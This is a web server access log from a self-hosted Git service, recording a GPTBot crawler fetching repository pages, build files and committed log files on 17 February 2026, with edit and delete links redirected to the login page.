"/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13231] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/controller-next-todo.md" +[17/Feb/2026:16:24:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13232] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/controller-next-todo.md" +[17/Feb/2026:16:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md?display=source" [Client 74.7.227.38] [Length 13231] [Gzip 4.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/controller-next-todo.md" +[17/Feb/2026:16:24:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal" +[17/Feb/2026:16:24:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal" +[17/Feb/2026:16:24:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/Dockerfile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/Dockerfile" +[17/Feb/2026:16:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/Dockerfile" +[17/Feb/2026:16:24:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal" +[17/Feb/2026:16:24:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal" +[17/Feb/2026:16:24:12 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_upload/main/OpcUaMinimal" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal" +[17/Feb/2026:16:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_upload/main/OpcUaMinimal" +[17/Feb/2026:16:24:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal" [Client 74.7.227.38] [Length 9791] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal" +[17/Feb/2026:16:24:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/Dockerfile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/Dockerfile" +[17/Feb/2026:16:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/Dockerfile" +[17/Feb/2026:16:24:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 11716] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal" +[17/Feb/2026:16:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log?display=rendered" [Client 74.7.227.38] [Length 10927] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:24:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log?display=source" [Client 74.7.227.38] [Length 28009] [Gzip 9.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_error.log" +[17/Feb/2026:16:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:24:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:24:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log?display=source" [Client 74.7.227.38] [Length 14442] [Gzip 4.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_error.log" +[17/Feb/2026:16:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:24:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log?display=source" [Client 74.7.227.38] [Length 19781] [Gzip 9.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_error.log" +[17/Feb/2026:16:24:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log?display=rendered" [Client 74.7.227.38] [Length 10926] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:24:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log?display=source" [Client 74.7.227.38] [Length 42999] [Gzip 16.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log?display=source" [Client 74.7.227.38] [Length 406947] [Gzip 15.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:24:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" +[17/Feb/2026:16:24:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/OpcUaMinimal.csproj" +[17/Feb/2026:16:24:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" +[17/Feb/2026:16:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcUaMinimal/OpcUaMinimal.csproj" +[17/Feb/2026:16:24:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 9813] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" +[17/Feb/2026:16:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 11031] [Gzip 3.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" +[17/Feb/2026:16:24:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 362] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" +[17/Feb/2026:16:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 911] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" +[17/Feb/2026:16:24:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-1_access.log" +[17/Feb/2026:16:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:24:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log?display=source" [Client 74.7.227.38] [Length 29727] [Gzip 11.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-2_access.log" +[17/Feb/2026:16:24:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log?display=source" [Client 74.7.227.38] [Length 47134] [Gzip 12.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_access.log" +[17/Feb/2026:16:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log?display=source" [Client 74.7.227.38] [Length 14019] [Gzip 4.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-3_error.log" +[17/Feb/2026:16:24:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log?display=rendered" [Client 74.7.227.38] [Length 10930] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/proxy-host-4_access.log" +[17/Feb/2026:16:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/index.html" [Client 74.7.227.38] [Length 14620] [Gzip 4.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup" +[17/Feb/2026:16:24:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/-/projects?q=&sort=reversealphabetically&state=open" [Client 74.7.227.38] [Length 6807] [Gzip 2.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/-/projects" +[17/Feb/2026:16:24:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" +[17/Feb/2026:16:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/OpcUaMinimal.csproj" +[17/Feb/2026:16:24:29 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_new/main/OpcUaMinimal/OpcUaMinimal.csproj" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" +[17/Feb/2026:16:24:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_new/main/OpcUaMinimal/OpcUaMinimal.csproj" +[17/Feb/2026:16:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11053] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/progress.marks" +[17/Feb/2026:16:24:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/.Notebook/BRIN%20%EC%84%A4%EB%AA%85.md" [Client 74.7.227.38] [Length 13370] [Gzip 2.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/.Notebook" +[17/Feb/2026:16:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15262] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:24:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.txt" [Client 74.7.227.38] [Length 11188] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX" [Client 74.7.227.38] [Length 10306] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10" +[17/Feb/2026:16:24:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" [Client 74.7.227.38] [Length 11464] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:24:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/link.d" [Client 74.7.227.38] [Length 13274] [Gzip 4.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" +[17/Feb/2026:16:24:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/index.html" +[17/Feb/2026:16:24:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/index.html" +[17/Feb/2026:16:24:34 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/index.html" +[17/Feb/2026:16:24:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/index.html" +[17/Feb/2026:16:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/index.html" [Client 74.7.227.38] [Length 812] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/index.html" +[17/Feb/2026:16:24:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/index.html" [Client 74.7.227.38] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/index.html" +[17/Feb/2026:16:24:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" [Client 74.7.227.38] [Length 15234] [Gzip 4.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/build/CMakeFiles/TestApp.dir" 